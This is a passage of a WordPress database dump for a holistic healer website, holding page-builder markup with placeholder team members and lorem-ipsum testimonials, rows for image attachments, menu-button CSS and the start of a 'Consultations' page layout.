{\"align\":\"center\",\"group_layout\":\"pagelayer-btn-grp-horizontal\",\"icon_spacing\":\"0\",\"icon_size\":\"20\",\"color_scheme\":\"\",\"icon_color\":\"#5c5858ff\",\"social_hover_delay\":\"400\",\"icon_color_hover\":\"#ffffff\",\"bg_shape\":\"pagelayer-social-shape-square\",\"bg_size\":\"7\",\"ele_margin\":\"-80px,0px,0px,0px\",\"ele_css\":\"{{element}} .pagelayer-service-image{\\ntop: 58px !important;\\nposition: relative;\\n}\",\"icon_bg_color\":\"#00ccff00\",\"icon_bg_color_hover\":\"#efba6cff\",\"icon_border_type\":\"solid\",\"icon_border_color\":\"#3b3b3e9e\",\"icon_border_width\":\"1,1,1,1\",\"social_hover\":\"hover\",\"pagelayer-id\":\"egf1310\"} -->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-facebook-f\",\"social_url\":\"https:\\/\\/facebook.com\\/sitepad\",\"pagelayer-id\":\"caz4725\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-twitter\",\"social_url\":\"https:\\/\\/twitter.com\\/sitepad\",\"pagelayer-id\":\"ese8910\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-google-plus-g\",\"social_url\":\"https:\\/\\/plus.google.com\\/sitepad\",\"pagelayer-id\":\"3so7116\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-linkedin-in\",\"social_url\":\"https:\\/\\/linkedin.com\\/sitepad\",\"pagelayer-id\":\"oxp4246\"} /-->\n<!-- /wp:pagelayer/pl_social_grp -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"1\",\"ele_margin\":\"3em,0em,0em,0em\",\"animation\":\"\",\"animation_delay\":\"700\",\"pagelayer-id\":\"nul8057\"} -->\n<!-- wp:pagelayer/pl_service {\"service_image\":\"4\",\"service_image_size\":\"custom\",\"service_alignment\":\"top\",\"service_vertical_alignment\":\"top\",\"img_bor_state\":\"normal\",\"img_filter\":\"0,100,100,0,0,100,100\",\"img_transition\":\"400\",\"img_filter_hover\":\"0,100,100,0,0,100,100\",\"service_heading\":\"James Duncan\",\"heading_alignment\":\"center\",\"service_title_spacing\":\"20,0,10,0\",\"heading_state\":\"normal\",\"service_heading_color\":\"#101112ff\",\"service_heading_typo\":\",18,,600,,,Solid,,Uppercase,,\",\"heading_transition\":\"400\",\"service_text_alignment\":\"center\",\"service_btn_hover_delay\":\"400\",\"service_content_spacing\":\"0,15,50,15\",\"service_image_custom_size\":\"120\",\"service_img_alignment\":\"center\",\"service_image_spacing\":\"0,0,0,0\",\"img_border_type\":\"solid\",\"img_border_color\":\"#dfdfdfff\",\"img_border_radius\":\"100%,100%,100%,100%\",\"border_type\":\"solid\",\"border_width\":\"1px,1px,1px,1px\",\"border_color\":\"#5b5959ff\",\"img_border_width\":\"1,1,1,1\",\"ele_css\":\"{{element}} .pagelayer-service-image{\\nmargin-top: -55px;\\n}\",\"ele_padding\":\"0px,0px,40px,0px\",\"service_text\":\"\\u003ch5\\u003eLeader\\u003c\\/h5\\u003e\\n\\u003cp\\u003eAl alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"db55026\"} --><h5>Leader</h5>\n<p>Al alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.</p><!-- /wp:pagelayer/pl_service -->\n<!-- wp:pagelayer/pl_social_grp {\"align\":\"center\",\"group_layout\":\"pagelayer-btn-grp-horizontal\",\"icon_spacing\":\"0\",\"icon_size\":\"20\",\"color_scheme\":\"\",\"icon_color\":\"#5c5858ff\",\"social_hover_delay\":\"400\",\"icon_color_hover\":\"#ffffff\",\"bg_shape\":\"pagelayer-social-shape-square\",\"bg_size\":\"7\",\"ele_margin\":\"-80px,0px,0px,0px\",\"ele_css\":\"{{element}} .pagelayer-service-image{\\ntop: 58px !important;\\nposition: relative;\\n}\",\"icon_bg_color\":\"#00ccff00\",\"icon_bg_color_hover\":\"#efba6cff\",\"icon_border_type\":\"solid\",\"icon_border_color\":\"#3b3b3e9e\",\"icon_border_width\":\"1,1,1,1\",\"social_hover\":\"hover\",\"pagelayer-id\":\"mny1495\"} -->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-facebook-f\",\"social_url\":\"https:\\/\\/facebook.com\\/sitepad\",\"pagelayer-id\":\"5xn7585\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-twitter\",\"social_url\":\"https:\\/\\/twitter.com\\/sitepad\",\"pagelayer-id\":\"gyf6039\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-google-plus-g\",\"social_url\":\"https:\\/\\/plus.google.com\\/sitepad\",\"pagelayer-id\":\"kur7407\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-linkedin-in\",\"social_url\":\"https:\\/\\/linkedin.com\\/sitepad\",\"pagelayer-id\":\"uh89652\"} /-->\n<!-- /wp:pagelayer/pl_social_grp -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"1\",\"ele_margin\":\"3em,0em,0em,0em\",\"animation\":\"\",\"animation_delay\":\"700\",\"pagelayer-id\":\"opd4644\"} -->\n<!-- wp:pagelayer/pl_service {\"service_image\":\"4\",\"service_image_size\":\"custom\",\"service_alignment\":\"top\",\"service_vertical_alignment\":\"top\",\"img_bor_state\":\"normal\",\"img_filter\":\"0,100,100,0,0,100,100\",\"img_transition\":\"400\",\"img_filter_hover\":\"0,100,100,0,0,100,100\",\"service_heading\":\"Lori Harvey\",\"heading_alignment\":\"center\",\"service_title_spacing\":\"20,0,10,0\",\"heading_state\":\"normal\",\"service_heading_color\":\"#101112ff\",\"service_heading_typo\":\",18,,600,,,Solid,,Uppercase,,\",\"heading_transition\":\"400\",\"service_text_alignment\":\"center\",\"service_btn_hover_delay\":\"400\",\"service_content_spacing\":\"0,15,50,15\",\"service_image_custom_size\":\"120\",\"service_img_alignment\":\"center\",\"service_image_spacing\":\"0,0,0,0\",\"img_border_type\":\"solid\",\"img_border_color\":\"#dfdfdfff\",\"img_border_radius\":\"100%,100%,100%,100%\",\"border_type\":\"solid\",\"border_width\":\"1px,1px,1px,1px\",\"border_color\":\"#5b5959ff\",\"img_border_width\":\"1,1,1,1\",\"ele_css\":\"{{element}} .pagelayer-service-image{\\nmargin-top: -55px;\\n}\",\"ele_padding\":\"0px,0px,40px,0px\",\"service_text\":\"\\u003ch5\\u003eSupervisor\\u003c\\/h5\\u003e\\n\\u003cp\\u003eAl alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"l8u8105\"} --><h5>Supervisor</h5>\n<p>Al alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.</p><!-- /wp:pagelayer/pl_service -->\n<!-- wp:pagelayer/pl_social_grp {\"align\":\"center\",\"group_layout\":\"pagelayer-btn-grp-horizontal\",\"icon_spacing\":\"0\",\"icon_size\":\"20\",\"color_scheme\":\"\",\"icon_color\":\"#5c5858ff\",\"social_hover_delay\":\"400\",\"icon_color_hover\":\"#ffffff\",\"bg_shape\":\"pagelayer-social-shape-square\",\"bg_size\":\"7\",\"ele_margin\":\"-80px,0px,0px,0px\",\"ele_css\":\"{{element}} .pagelayer-service-image{\\ntop: 58px !important;\\nposition: relative;\\n}\",\"icon_bg_color\":\"#00ccff00\",\"icon_bg_color_hover\":\"#efba6cff\",\"icon_border_type\":\"solid\",\"icon_border_color\":\"#3b3b3e9e\",\"icon_border_width\":\"1,1,1,1\",\"social_hover\":\"hover\",\"pagelayer-id\":\"idy6377\"} -->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-facebook-f\",\"social_url\":\"https:\\/\\/facebook.com\\/sitepad\",\"pagelayer-id\":\"ou47819\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-twitter\",\"social_url\":\"https:\\/\\/twitter.com\\/sitepad\",\"pagelayer-id\":\"o669787\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-google-plus-g\",\"social_url\":\"https:\\/\\/plus.google.com\\/sitepad\",\"pagelayer-id\":\"8pc7951\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-linkedin-in\",\"social_url\":\"https:\\/\\/linkedin.com\\/sitepad\",\"pagelayer-id\":\"h7g1675\"} /-->\n<!-- /wp:pagelayer/pl_social_grp -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"1\",\"ele_margin\":\"3em,0em,0em,0em\",\"animation\":\"\",\"animation_delay\":\"800\",\"pagelayer-id\":\"cw23874\"} -->\n<!-- wp:pagelayer/pl_service {\"service_image\":\"4\",\"service_image_size\":\"custom\",\"service_alignment\":\"top\",\"service_vertical_alignment\":\"top\",\"img_bor_state\":\"normal\",\"img_filter\":\"0,100,100,0,0,100,100\",\"img_transition\":\"400\",\"img_filter_hover\":\"0,100,100,0,0,100,100\",\"service_heading\":\"Ralph Fields\",\"heading_alignment\":\"center\",\"service_title_spacing\":\"20,0,10,0\",\"heading_state\":\"normal\",\"service_heading_color\":\"#101112ff\",\"service_heading_typo\":\",18,,600,,,Solid,,Uppercase,,\",\"heading_transition\":\"400\",\"service_text_alignment\":\"center\",\"service_btn_hover_delay\":\"400\",\"service_content_spacing\":\"0,15,50,15\",\"service_image_custom_size\":\"120\",\"service_img_alignment\":\"center\",\"service_image_spacing\":\"0,0,0,0\",\"img_border_type\":\"solid\",\"img_border_color\":\"#dfdfdfff\",\"img_border_radius\":\"100%,100%,100%,100%\",\"border_type\":\"solid\",\"border_width\":\"1px,1px,1px,1px\",\"border_color\":\"#5b5959ff\",\"img_border_width\":\"1,1,1,1\",\"ele_css\":\"{{element}} .pagelayer-service-image{\\nmargin-top: -55px;\\n}\",\"ele_padding\":\"0px,0px,40px,0px\",\"service_text\":\"\\u003ch5\\u003eFounder\\u003c\\/h5\\u003e\\n\\u003cp\\u003eAl alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"zck4605\"} --><h5>Founder</h5>\n<p>Al alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.</p><!-- /wp:pagelayer/pl_service -->\n<!-- wp:pagelayer/pl_social_grp {\"align\":\"center\",\"group_layout\":\"pagelayer-btn-grp-horizontal\",\"icon_spacing\":\"0\",\"icon_size\":\"20\",\"color_scheme\":\"\",\"icon_color\":\"#5c5858ff\",\"social_hover_delay\":\"400\",\"icon_color_hover\":\"#ffffff\",\"bg_shape\":\"pagelayer-social-shape-square\",\"bg_size\":\"7\",\"ele_margin\":\"-80px,0px,0px,0px\",\"ele_css\":\"{{element}} .pagelayer-service-image{\\ntop: 58px !important;\\nposition: relative;\\n}\",\"icon_bg_color\":\"#00ccff00\",\"icon_bg_color_hover\":\"#efba6cff\",\"icon_border_type\":\"solid\",\"icon_border_color\":\"#3b3b3e9e\",\"icon_border_width\":\"1,1,1,1\",\"social_hover\":\"hover\",\"pagelayer-id\":\"ht86316\"} -->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-facebook-f\",\"social_url\":\"https:\\/\\/facebook.com\\/sitepad\",\"pagelayer-id\":\"ojf2660\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-twitter\",\"social_url\":\"https:\\/\\/twitter.com\\/sitepad\",\"pagelayer-id\":\"j5p8986\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-google-plus-g\",\"social_url\":\"https:\\/\\/plus.google.com\\/sitepad\",\"pagelayer-id\":\"m0q2052\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-linkedin-in\",\"social_url\":\"https:\\/\\/linkedin.com\\/sitepad\",\"pagelayer-id\":\"0vq2271\"} /-->\n<!-- /wp:pagelayer/pl_social_grp -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_padding\":\"5em,0em,4em,0em\",\"ele_padding_mobile\":\"2em,0em,0em,0em\",\"ele_padding_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"sjm4980\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"0\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"7tl6661\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-4px,0px,0px,0px\",\"text\":\"\\u003ch5\\u003eTestimonial\\u003c\\/h5\\u003e\",\"color\":\"\",\"pagelayer-id\":\"vjw1728\"} --><h5>Testimonial</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-65px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"heading_typo_mobile\":\",50,,,,,Solid,,,,\",\"heading_typo_tablet\":\",65,,,,,Solid,,,,\",\"text\":\"\\u003ch2\\u003eTestimonial\\u003c\\/h2\\u003e\",\"pagelayer-id\":\"6od9463\"} --><h2>Testimonial</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"1em,0em,2em,0em\",\"ele_padding_mobile\":\"1px,10px,1px,10px\",\"text\":\"\\u003cp style=\\u0022text-align: center\\u0022\\u003eNulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. \\u003cbr \\/\\u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.\\u003cbr \\/\\u003e Nibh venenatis cras sed felis eget velit aliquet sagittis.\\u003c\\/p\\u003e\",\"ele_custom_pos\":\"true\",\"ele_align\":\"50%\",\"ele_height\":\"auto\",\"ele_custom_width\":\"650px\",\"pagelayer-id\":\"3yh5533\"} --><p style=\"text-align: center\">Nulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. <br />Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.<br /> Nibh venenatis cras sed felis eget velit aliquet sagittis.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_testimonial_slider {\"slide_items\":\"3\",\"slide_margin\":\"10\",\"arrows_bg\":\"#6a6969\",\"arraow_color\":\"#ffffff\",\"arraow_bg_size\":\"20\",\"arraow_bg_shape\":\"20\",\"ele_bg_hover_delay\":\"400\",\"ele_css\":\"{{element}} .pagelayer-testimonial-content{\\nbox-shadow: 0 2px 5px #eee;\\npadding: 20px;\\n}\",\"slide_controls\":\"pager\",\"animation\":\"\",\"pagelayer-id\":\"vi93287\"} -->\n<!-- wp:pagelayer/pl_testimonial {\"image_position\":\"aside-position\",\"alignment\":\"center\",\"author-spacing\":\"22\",\"avatar\":\"9\",\"testimonial_image_size\":\"100\",\"img_shape\":\"square\",\"cite\":\"John Smith\",\"cite_color\":\"#141718ff\",\"cite_style\":\",18,,600,,,Solid,,,,\",\"designation\":\"Traveler\",\"designation_color\":\"#eeaa6dff\",\"cite_designation_style\":\",16,,500,,,Solid,,,,\",\"ele_bg_hover_delay\":\"400\",\"testimonial_border_type\":\"double\",\"testimonial_border_color\":\"#eeaa6dff\",\"testimonial_border_width\":\"10,10,10,10\",\"cite_spacing\":\"0,0,0,20\",\"quote_content\":\"\\u003cp style=\\u0022font-size: 14px\\u0022\\u003eLorem ipsum dolor sit ametsed do eiusmodet dolore magna aliqua. Uquis nostrud exercitation ullamco commodo consequat.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"6nf2452\"} --><p style=\"font-size: 14px\">Lorem ipsum dolor sit ametsed do eiusmodet dolore magna aliqua. Uquis nostrud exercitation ullamco commodo consequat.</p><!-- /wp:pagelayer/pl_testimonial -->\n<!-- wp:pagelayer/pl_testimonial {\"image_position\":\"aside-position\",\"alignment\":\"center\",\"author-spacing\":\"22\",\"avatar\":\"9\",\"testimonial_image_size\":\"100\",\"img_shape\":\"square\",\"cite\":\"Daisy Shah\",\"cite_color\":\"#141718ff\",\"cite_style\":\",18,,600,,,Solid,,,,\",\"designation\":\"Traveler\",\"designation_color\":\"#eeaa6dff\",\"cite_designation_style\":\",16,,500,,,Solid,,,,\",\"ele_bg_hover_delay\":\"400\",\"testimonial_border_type\":\"double\",\"testimonial_border_color\":\"#eeaa6dff\",\"testimonial_border_width\":\"10,10,10,10\",\"cite_spacing\":\"0,0,0,20\",\"quote_content\":\"\\u003cp style=\\u0022font-size: 14px\\u0022\\u003eLorem ipsum dolor sit ametsed do eiusmodet dolore magna aliqua. Uquis nostrud exercitation ullamco commodo consequat.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"2545962\"} --><p style=\"font-size: 14px\">Lorem ipsum dolor sit ametsed do eiusmodet dolore magna aliqua. Uquis nostrud exercitation ullamco commodo consequat.</p><!-- /wp:pagelayer/pl_testimonial -->\n<!-- wp:pagelayer/pl_testimonial {\"image_position\":\"aside-position\",\"alignment\":\"center\",\"author-spacing\":\"22\",\"avatar\":\"9\",\"testimonial_image_size\":\"100\",\"img_shape\":\"square\",\"cite\":\"Simon Toufel\",\"cite_color\":\"#141718ff\",\"cite_style\":\",18,,600,,,Solid,,,,\",\"designation\":\"Traveler\",\"designation_color\":\"#eeaa6dff\",\"cite_designation_style\":\",16,,500,,,Solid,,,,\",\"ele_bg_hover_delay\":\"400\",\"testimonial_border_type\":\"double\",\"testimonial_border_color\":\"#eeaa6dff\",\"testimonial_border_width\":\"10,10,10,10\",\"cite_spacing\":\"0,0,0,20\",\"quote_content\":\"\\u003cp style=\\u0022font-size: 14px\\u0022\\u003eLorem ipsum dolor sit ametsed do eiusmodet dolore magna aliqua. Uquis nostrud exercitation ullamco commodo consequat.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"rz69247\"} --><p style=\"font-size: 14px\">Lorem ipsum dolor sit ametsed do eiusmodet dolore magna aliqua. Uquis nostrud exercitation ullamco commodo consequat.</p><!-- /wp:pagelayer/pl_testimonial -->\n<!-- wp:pagelayer/pl_testimonial {\"image_position\":\"aside-position\",\"alignment\":\"center\",\"author-spacing\":\"22\",\"avatar\":\"9\",\"testimonial_image_size\":\"100\",\"img_shape\":\"square\",\"cite\":\"John Smith\",\"cite_color\":\"#141718ff\",\"cite_style\":\",18,,600,,,Solid,,,,\",\"designation\":\"Web Developer\",\"designation_color\":\"#eeaa6dff\",\"cite_designation_style\":\",16,,500,,,Solid,,,,\",\"ele_bg_hover_delay\":\"400\",\"testimonial_border_type\":\"double\",\"testimonial_border_color\":\"#eeaa6dff\",\"testimonial_border_width\":\"10,10,10,10\",\"cite_spacing\":\"0,0,0,20\",\"quote_content\":\"\\u003cp style=\\u0022font-size: 14px\\u0022\\u003eLorem ipsum dolor sit ametsed do eiusmodet dolore magna aliqua. Uquis nostrud exercitation ullamco commodo consequat.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"8fm3851\"} --><p style=\"font-size: 14px\">Lorem ipsum dolor sit ametsed do eiusmodet dolore magna aliqua. Uquis nostrud exercitation ullamco commodo consequat.</p><!-- /wp:pagelayer/pl_testimonial -->\n<!-- /wp:pagelayer/pl_testimonial_slider -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->[/et_pb_text][/et_pb_column]\n [/et_pb_row]\n [/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-01 09:47:49','2021-05-01 01:47:49','',28,'https://verde.desidrivers.com.au/?p=66',0,'revision','',0),(67,1,'2021-05-01 10:42:30','2021-05-01 02:42:30','','holistic-healer-21','','inherit','open','closed','','holistic-healer-21','','','2021-05-01 10:42:30','2021-05-01 02:42:30','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-21.png',0,'attachment','image/png',0),(68,1,'2021-05-01 10:42:35','2021-05-01 02:42:35','','holistic-healer-icon-3','','inherit','open','closed','','holistic-healer-icon-3','','','2021-05-01 10:42:35','2021-05-01 02:42:35','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-3.png',0,'attachment','image/png',0),(69,1,'2021-05-01 10:42:41','2021-05-01 02:42:41','','holistic-healer-icon-1','','inherit','open','closed','','holistic-healer-icon-1','','','2021-05-01 10:42:41','2021-05-01 02:42:41','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-1.png',0,'attachment','image/png',0),(70,1,'2021-05-01 10:42:45','2021-05-01 02:42:45','','holistic-healer-icon-5','','inherit','open','closed','','holistic-healer-icon-5','','','2021-05-01 10:42:45','2021-05-01 02:42:45','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-5.png',0,'attachment','image/png',0),(71,1,'2021-05-01 10:42:51','2021-05-01 02:42:51','','holistic-healer-icon-10','','inherit','open','closed','','holistic-healer-icon-10','','','2021-05-01 10:42:51','2021-05-01 02:42:51','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-10.png',0,'attachment','image/png',0),(72,1,'2021-05-01 10:43:00','2021-05-01 02:43:00','','holistic-healer-24','','inherit','open','closed','','holistic-healer-24','','','2021-05-01 10:43:00','2021-05-01 02:43:00','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-24.png',0,'attachment','image/png',0),(73,1,'2021-05-01 10:43:04','2021-05-01 02:43:04','','holistic-healer-46','','inherit','open','closed','','holistic-healer-46','','','2021-05-01 10:43:04','2021-05-01 02:43:04','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-46.png',0,'attachment','image/png',0),(74,1,'2021-05-01 10:43:08','2021-05-01 02:43:08','','holistic-healer-icon-2','','inherit','open','closed','','holistic-healer-icon-2','','','2021-05-01 10:43:08','2021-05-01 02:43:08','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-2.png',0,'attachment','image/png',0),(75,1,'2021-05-01 10:43:14','2021-05-01 02:43:14','','holistic-healer-icon-7','','inherit','open','closed','','holistic-healer-icon-7','','','2021-05-01 10:43:14','2021-05-01 02:43:14','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-7.png',0,'attachment','image/png',0),(76,1,'2021-05-01 10:43:21','2021-05-01 02:43:21','','holistic-healer-icon-4','','inherit','open','closed','','holistic-healer-icon-4','','','2021-05-01 10:43:21','2021-05-01 02:43:21','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-4.png',0,'attachment','image/png',0),(77,1,'2021-05-01 10:43:30','2021-05-01 02:43:30','','holistic-healer-53','','inherit','open','closed','','holistic-healer-53','','','2021-05-01 10:43:30','2021-05-01 02:43:30','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg',0,'attachment','image/jpeg',0),(84,1,'2021-05-01 10:58:18','2021-05-01 02:58:18','.menu_cta a {\r\n background-color:#ffffff;\r\n border-radius:28px;\r\n border:2px solid #000000;\r\n padding: 12px!important;\r\n color: #000000!important;\r\n}\r\n\r\n.et_header_style_left #et-top-navigation {\r\n padding-top: 20px!important;\r\n}\r\n \r\n.et_header_style_left .et-fixed-header #et-top-navigation {\r\n padding-top: 6px!important;\r\n}\r\n\r\n@media only screen and (max-width: 980px) {\r\n .menu_cta {\r\n text-align:center;\r\n max-width:200px;\r\n }\r\n.menu_cta a {\r\n background-color:#ffffff;\r\n border-radius:28px;\r\n border:2px solid #000000!important;\r\n \r\n padding: 12px!important;\r\n color: #000000!important;\r\n }\r\n}','Divi','','publish','closed','closed','','divi','','','2025-10-22 14:45:10','2025-10-22 06:45:10','',0,'https://verde.desidrivers.com.au/2021/05/01/divi/',0,'custom_css','',0),(85,1,'2021-05-01 10:58:18','2021-05-01 02:58:18','','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-01 10:58:18','2021-05-01 02:58:18','',84,'https://verde.desidrivers.com.au/?p=85',0,'revision','',0),(88,1,'2021-05-01 11:04:13','2021-05-01 03:04:13','','height-cropped','','inherit','open','closed','','height-cropped','','','2021-05-01 11:04:13','2021-05-01 03:04:13','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/height-cropped.jpg',0,'attachment','image/jpeg',0),(118,1,'2021-05-24 22:01:04','2021-05-24 14:01:04','','1-01','','inherit','open','closed','','1-01','','','2021-05-24 22:01:04','2021-05-24 14:01:04','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.png',0,'attachment','image/png',0),(119,1,'2021-05-24 22:03:03','2021-05-24 14:03:03','','2-01','','inherit','open','closed','','2-01','','','2021-05-24 22:03:03','2021-05-24 14:03:03','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png',0,'attachment','image/png',0),(120,1,'2021-05-24 22:08:18','2021-05-24 14:08:18','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||180px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#000000\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\"]<h1><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"> Consultations</span></h1>\n<p><span style=\"font-family: Montserrat;\">Choose from face-to-face and online Zoom consults.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Services\" _builder_version=\"4.9.4\"][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-120px||||false|false\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" 